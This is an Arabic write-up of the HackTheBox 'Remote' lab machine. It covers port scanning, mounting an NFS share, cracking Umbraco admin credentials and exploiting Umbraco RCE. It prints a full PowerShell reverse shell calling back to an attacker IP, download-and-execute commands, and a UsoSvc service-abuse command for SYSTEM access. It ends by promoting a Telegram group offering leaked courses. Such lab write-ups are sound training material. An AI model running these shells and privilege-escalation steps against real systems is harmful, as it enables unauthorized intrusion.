
أستمر في نشر الحلول المرسلة لإنهاء الآلات من موقع HackTheBox .
في هذه المقالة ، نتعمق في مورد NFS ، ونتعامل مع استغلال RCE لـ CMS Umbraco والعثور على متجه LPE عبر UsoSvc باستخدام PowerUp.
الاتصال بالمختبر عبر VPN. يوصى بعدم الاتصال من كمبيوتر العمل أو من مضيف توجد به بيانات مهمة بالنسبة لك ، حيث تجد نفسك في شبكة خاصة مع أشخاص يعرفون شيئًا عن أمن المعلومات.
المعلومات التنظيمية
ريكون
يحتوي هذا الجهاز على عنوان IP يبلغ 10.10.10.180 ، والذي أقوم بإضافته إلى / etc / hosts.
10.10.10.180 remote.htb
الخطوة الأولى هي فحص المنافذ المفتوحة. نظرًا لأن مسح جميع المنافذ باستخدام nmap يستغرق وقتًا طويلاً ، فسوف أقوم بذلك أولاً باستخدام masscan. نقوم بفحص جميع منافذ TCP و UDP من واجهة tun0 بمعدل 500 حزمة في الثانية.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.180 --rate=500
العديد من المنافذ مفتوحة على المضيف. الآن دعنا نفحصها باستخدام nmap لتصفية وتحديد ما نحتاج إليه.
nmap remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21
الآن ، للحصول على معلومات أكثر تفصيلاً حول الخدمات التي تعمل على المنافذ ، قم بإجراء فحص باستخدام الخيار -A.
nmap -A remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21
المنفذ 111 مسؤول عن NFS (يسمح لك بتحميل أنظمة الملفات البعيدة عبر الشبكة). دعونا نرى قائمة الموارد.
لدينا موارد متاحة ، دعنا ننشئ هذا المورد.
وفي هذا الدليل نجد Web.config ومجلد Umbraco. Umbraco عبارة عن منصة مفتوحة المصدر لنظام إدارة المحتوى.
وبالتالي ، نحتاج إلى رؤية جميع التكوينات ، وكذلك معرفة إصدار Umbraco. هذا ما يمكن ملاحظته في Web.Config.
تم العثور على بيانات اعتماد smtp وإصدار Umbraco: 7.12.4. كورايا معرضة للخطر إذا كانت أوراق الاعتماد موجودة.
نقطة الدخول
بعد ذلك ، قمت بإدراج جميع الملفات والأدلة المتوفرة على الخادم البعيد من أجل تحديد وعرض الملفات التي تهمك.
ls -lR ./
بعد أن يكون نطاق الملفات محدودًا ، يجب عليك عرضها (يمكنك استخدام grep بشكل سطحي لتحديد سطور مثل: المستخدم ، تسجيل الدخول ، المرور ، مقابل ، إلخ). هذه هي الطريقة التي نجد بها معلومات حول وجود مستخدمين:
بعد ذلك ، نبحث مرة أخرى عن سطري admin و ssmith. ونجد تجزئات لبيانات المستخدم.
ونجح في اختراق كلمة مرور المسؤول.
إذا نظرت إلى قاعدة إكسبلويت ديسيبل ، فثمة ثغرة جاهزة ، لكنها بحاجة إلى تغيير طفيف.
المستعمل
أولاً: نحدد أوراق الاعتماد والمضيف.
ثانيًا ، سنقوم بتغيير الحمل عن طريق تحديد الملف القابل للتنفيذ والمعلمات إليه. في هذه الحالة ، نستخدم الأمر ping للاختبار.
بمجرد تشغيل البرنامج ، سنرى حزم ICMP في tcpdump.
لنقم بتحميل الغلاف العكسي التالي:
$client = New-Object System.Net.Sockets.TCPClient('10.10.15.60',4321)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
لنحفظه في shell.ps1 ، ابدأ خادم http على الجهاز المحلي.
sudo python3 -m http.server
دعونا نغير الحمل.
وبعد التنفيذ ، حصلنا على اتصال خلفي.
لا توجد أدلة مستخدم على الخادم ، لذلك نجد العلامة في Public.
جذر
بعد الاطلاع على المعلومات المتعلقة بالمستخدم ، نلاحظ امتيازًا مثيرًا للاهتمام.
ولكن نظرًا لأن هذا هو Windows Server 2019 ، فلن يعمل انتحال الرمز المميز لـ LPE.
استخدام دعونا PowerUp للعثور على ناقلات LPE. لنقم بتنزيله من المضيف المحلي ونقوم بفحص كامل.
iex (New-Object Net.WebClient).DownloadString('http://10.10.15.60/tools/PowerUp.ps1');Invoke-AllChecks
ولدينا أذونات لتحديث خدمة Orchestrator. Update Orchestrator هي خدمة تنظم تحديثات Windows لك. هذه الخدمة مسؤولة عن التنزيل والتثبيت والتحقق من وجود تحديثات للكمبيوتر.
لنقم بإنشاء غلاف ثانٍ (قم بتغيير المنفذ في الأول) وقم بتحميله على الجهاز.
wget http://10.10.15.60/shell2.ps1 -O C:\Windows\Temp\shell2.ps1
والآن لنقم بتشغيله باستخدام UsoSvc.
Invoke-ServiceAbuse -Name UsoSvc -Command "cmd.exe /c powershell C:\Windows\Temp\shell2.ps1"
ونحصل على اتصال خلفي.
يمكنك الانضمام إلينا على Telegram . هناك يمكنك العثور على مواد مثيرة للاهتمام ودورات مسربة وبرامج. دعنا نجمع مجتمعًا ، حيث سيكون هناك أشخاص على دراية بالعديد من مجالات تكنولوجيا المعلومات ، ثم يمكننا دائمًا مساعدة بعضنا البعض في أي مشكلات تتعلق بتكنولوجيا المعلومات وأمن المعلومات.